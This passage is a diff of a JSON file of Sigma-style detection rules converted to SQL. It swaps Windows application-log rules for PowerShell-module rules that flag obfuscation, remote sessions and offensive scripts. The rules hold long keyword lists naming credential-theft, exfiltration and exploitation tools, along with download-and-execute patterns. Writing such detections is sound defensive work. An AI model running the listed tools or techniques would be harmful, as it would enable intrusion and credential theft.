{ - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", - "status": "test", - "description": "Detects backup catalog 
deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", - "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + 
"attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE 
'%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR 
Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": 
"711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike 
Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' 
AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR 